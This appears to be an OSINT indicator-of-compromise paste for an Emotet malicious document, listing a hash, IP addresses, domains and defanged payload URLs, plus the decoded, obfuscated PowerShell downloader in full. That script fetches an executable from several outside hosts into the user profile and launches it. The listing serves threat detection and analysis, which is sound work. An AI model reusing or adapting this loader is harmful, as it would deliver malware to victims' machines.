paladin316

Emotet_Doc_out_2019-10-21_13_52.txt

Oct 21st, 2019
#Emotet #Docs #malware #OSINT #IOC

MD5:
2b87d6a20674b8522d0cca2c97c42caf

IPs:
101.227.64.237
142.4.50.75
35.184.134.213
63.250.34.68

Domains:
aijdjy.com
obbydeemusic.com
veeplan.com
www.kmacobd.com
xsnonline.us

URLs:
hxxps://www.microsoft.com/ #> $bb147x080c2=
hxxp://xsnonline.us/blogs/4x466v/
hxxp://obbydeemusic.com/aqoeivj4fd/us5htvn/
hxxp://veeplan.com/wp-content/dW0o3RoJNG/
hxxp://www.kmacobd.com/u9r/
hxxp://aijdjy.com/dup-installer/t0/

Decoded Base64 Powershell:
<# hxxps://www.microsoft.com/ #> $bb147x080c2='x2730503cb06';
$b5x0c4c6b3488 = '856';
$cb05c6510c007='c018309x0c2';
$xc0x57b38b2x7=$env:userprofile+'\'+$b5x0c4c6b3488+'.exe';
$x3094x09c0b0='cc082602x31';
$xc2c295x20802=.('n'+'ew-obje'+'ct') NeT.wEBCLiENT;
$b00b1371081='hxxp://xsnonline.us/blogs/4x466v/
hxxp://obbydeemusic.com/aqoeivj4fd/us5htvn/
hxxp://veeplan.com/wp-content/dW0o3RoJNG/
hxxp://www.kmacobd.com/u9r/
hxxp://aijdjy.com/dup-installer/t0/'."spL`iT"('
');
$cxc2000153b='c78xb8790006';
foreach($bc16801430cx in $b00b1371081){try{$xc2c295x20802."DowNL`OAdfi`Le"($bc16801430cx, $xc0x57b38b2x7);
$b9366b008x6='c0300c98270';
If ((.('Get-I'+'t'+'em') $xc0x57b38b2x7)."l`engTh" -ge 24516) {[Diagnostics.Process]::"s`TarT"($xc0x57b38b2x7);
$bxc100525c074='c7604007xx328';
break;
$b2037060949='xx20b93043c0'}}catch{}}$xc56003958xx='c059234006c0'